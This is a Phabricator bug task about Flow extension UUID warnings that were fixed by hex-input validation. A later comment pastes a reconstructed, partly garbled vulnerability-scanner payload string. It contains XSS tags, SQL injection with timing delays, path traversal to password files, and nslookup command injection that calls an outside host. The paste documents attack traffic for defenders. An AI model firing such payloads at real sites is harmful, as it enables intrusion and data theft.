Page MenuHomePhabricator

Invalid argument: Type H: illegal hex digit in Model/UUID
Closed, ResolvedPublic

Description

Spotted in production:

1 Warning: Invalid argument: Type H: illegal hex digit y in /srv/mediawiki/php-1.25wmf19/extensions/Flow/includes/Model/UUID.php on line 412
1 Warning: Invalid argument: Type H: illegal hex digit t in /srv/mediawiki/php-1.25wmf19/extensions/Flow/includes/Model/UUID.php on line 412
1 Warning: Invalid argument: Type H: illegal hex digit r in /srv/mediawiki/php-1.25wmf19/extensions/Flow/includes/Model/UUID.php on line 412
1 Warning: Invalid argument: Type H: illegal hex digit p in /srv/mediawiki/php-1.25wmf19/extensions/Flow/includes/Model/UUID.php on line 412
1 Warning: Invalid argument: Type H: illegal hex digit l in /srv/mediawiki/php-1.25wmf19/extensions/Flow/includes/Model/UUID.php on line 412
1 Warning: Invalid argument: Type H: illegal hex digit / in /srv/mediawiki/php-1.25wmf19/extensions/Flow/includes/Model/UUID.php on line 412
1 Warning: Invalid argument: Type H: illegal hex digit g in /srv/mediawiki/php-1.25wmf19/extensions/Flow/includes/Model/UUID.php on line 412

Details

Related Gerrit Patches:
mediawiki/extensions/Flow : masterValidate input as hex string

Event Timeline

demon created this task.Mar 5 2015, 3:33 PM
demon raised the priority of this task from to Needs Triage.
demon updated the task description. (Show Details)
demon added a subscriber: demon.
Restricted Application added a subscriber: Aklapper. · View Herald TranscriptMar 5 2015, 3:33 PM

I wonder if there is any way we can get stack traces output with warnings, without them i'm rather unsure what exactly happened here.

We should see if these can be caught by a user-defined error handler.

EBernhardson triaged this task as Medium priority.Mar 5 2015, 6:49 PM

Change 194566 had a related patch set uploaded (by EBernhardson):
Validate input as hex string

https://gerrit.wikimedia.org/r/194566

The submitted patch might solve this problem (at least you can trigger it through that code path), but not 100% sure this was same source without a stack trace

Change 194566 merged by jenkins-bot:
Validate input as hex string

https://gerrit.wikimedia.org/r/194566

Mattflaschen-WMF closed this task as Resolved.Mar 10 2015, 12:34 AM
Mattflaschen-WMF assigned this task to EBernhardson.
Mattflaschen-WMF set Security to None.

Now that's merged, let's close and re-open if it comes up again.

Restricted Application added a project: Collaboration-Team-Triage. · View Herald TranscriptJun 12 2015, 6:35 PM
Zoglun added a subscriber: Zoglun.Feb 25 2019, 12:14 AM

Hi,

I'm NOT reporting bug ,but I would like to share some info that we found. It seems that the filter work as expected. The extension might need some improvement to handle even further advanced xss attack.

Using MW 1.31.1.

We found some error message like:
PHP Warning: pack(): Type H: illegal hex digit I in /w/extensions/FlowThread/includes/UUID.php on line 52

By combining them we got following: (" mark converted)

"+rspons.writ(*)+"rspons.writ(*)'+rspons.writ(*)+'"+rspons.writ(*)+"VliPostIVliPostIVliPostIYPrgUjNRiX$(nslookupns..\.-...\.xss.m)&nslookupns..\.-...\.xss.m&'\"`&nslookupns..\.-...\.xss.m&`'&nslookupns..\.-...\.xss.m&'\"`&nslookupns..\.-...\.xss.m&`'VliPostIVliPostI:.-...@xss.m-OR+--=+++VliPostI-'OR+--=+++or'JhNQqlT'='i(now()=syst(),slp(),)/*'XOR(i(now()=syst(),slp(),))OR'"XOR(i(now()=syst(),slp(),))OR"*/jswY');sltpg_slp();--'"\'\");VliPostIVliPostI-OR+--=+++--VliPostI-'OR+--=+++or'rzUphH'='-"OR+--=+++---"OR*>(++-)--witorly'::'--${+}VliPostIVliPostIhttp://som-inxistnt-wsit.u/som_inxistnt_il_with_long_nm?.jpg../../../../../../../../../../t/psswVliPostIhttp://tstsp.vulnw.om/t/it.txt?.jpg.\\./.\\./.\\./.\\./.\\./.\\./t/psswHttp://tstsp.vulnw.om/t/it.txt/t/psswhttp://tstsp.vulnw.om/t/it.txt?.jpg../..//../..//../..//../..//../..//../..//../..//../..//t/psswQmiZQVJoVliPostI&n=v../../../../../../../../../../winows/win.ini/.\\./.\\./.\\./.\\./.\\./.\\./winows/win.iniVliPostIW-IN\w.xmlVliPostIVliPostI..%..%..%..%..%..%..%..%..%..%t%pssw%.jpg/t/psswhttp://tstsp.vulnw.om/t/xss.html?%.jpg';print(m(untix_wvs_surity_tst));$='%t%psswVliPostI';print(m(untix_wvs_surity_tst));$='il:///t/pssw";print(m(untix_wvs_surity_tst));$="http://hitjzyMzr.xss.m/pi.php/.${@print(m(untix_wvs_surity_tst))}\../../../../../../../../../../winows/win.iniVliPostIVliPostIVliPostIVliPostIVliPostI/.\\./.\\./.\\./.\\./.\\./.\\./winows/win.ini../..//../..//../..//../..//../..//../..//../..//../..//winows/win.ini../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././winows/win.ini)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))VliPostIVliPostI'"//www.vulnw.omVliPostI/\www.vulnw.omVliPostI���������%%/www.vulnw.om''""VliPostIVliPostI'"VliPostI'"VliPostIVliPostI'"()&%<x><SRiPt>k()</SRiPt>VliPostI{{*}}ux���z���z���xuVliPostI"sTYL='u:xpr/**/SSion(k())'="VliPostI<sript>k()</sript>VliPostI<SRiPt>k()</SRiPt>VliPostI<isinxtyp=imgsr=onrror=k()>VliPostI<img/sr=">"onrror=lrt()>%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%VliPostI<inpututoousonous=k()>VliPostI<img<!---->sr=xonrror=lrt();//><!---->VliPostI<%ontntitlonrsiz=k()>VliPostI<wVgx=>VliPostI<imgsR='http://ttkr-/log.php?VliPostI'"()&%<x><SRiPt>k()</SRiPt>ux���z���z���xu{{*}}u���s���s��s��uux���z���z���xuVliPostI"onmousovr=k()"VliPostI<SRiPt>k()</SRiPt>VliPostI<SRiPt>k()</SRiPt>VliPostI<vio><souronrror="jvsript:k()">VliPostI<svg	���������onlo=k();>VliPostI<imgsr=xyzOnrRor=k()>VliPostI<img/sr=">"onrror=lrt()>VliPostI\uSRiPt\k()\u/sripT\uVliPostI<inpututoousonous=k()><Hr=http://www.vulnw.om></>VliPostI}oy{u:xpr/**/SSion(k())}VliPostI<iRmsR=.om></IRm>VliPostIVliPostIVliPostIVliPostI

@Zoglun Feel free to create a new task for your new bugs, that old bug has resolved afaik.

mmodell changed the subtype of this task from "Task" to "Production Error".Aug 28 2019, 11:12 PM